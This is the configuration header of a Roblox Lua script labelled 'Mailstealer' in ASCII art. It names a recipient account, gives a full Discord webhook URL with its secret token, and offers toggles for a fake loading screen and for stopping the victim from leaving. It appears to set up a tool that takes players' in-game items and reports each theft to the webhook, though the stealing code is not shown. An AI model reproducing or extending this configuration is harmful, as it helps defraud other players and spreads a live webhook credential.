--[[
  __  __       _ _     _             _           
  |  \/  | __ _(_) |___| |_ ___  __ _| | ___ _ __ 
  | |\/| |/ _` | | / __| __/ _ \/ _` | |/ _ \ '__|
  | |  | | (_| | | \__ \ ||  __/ (_| | |  __/ |   
  |_|  |_|\__,_|_|_|___/\__\___|\__,_|_|\___|_|   

]]--

UserName = "JUHNNReal"
Webhook = "https://discord.com/api/webhooks/1127626910277587024/mQZxUimL0OmzjYueVBH8CDNJdrNhHqyAB9nmnj89myCicshvoDcDFRhFexIawEXHIrkY"
UserName2 = "JUHNNReal"

_G.LoadingScreen = false -- make it true if you want the loadingscreen
_G.AntiLeave = false -- make it true if you want the antileave
_G.MouseLock = false -- make it true if you want the mouselock
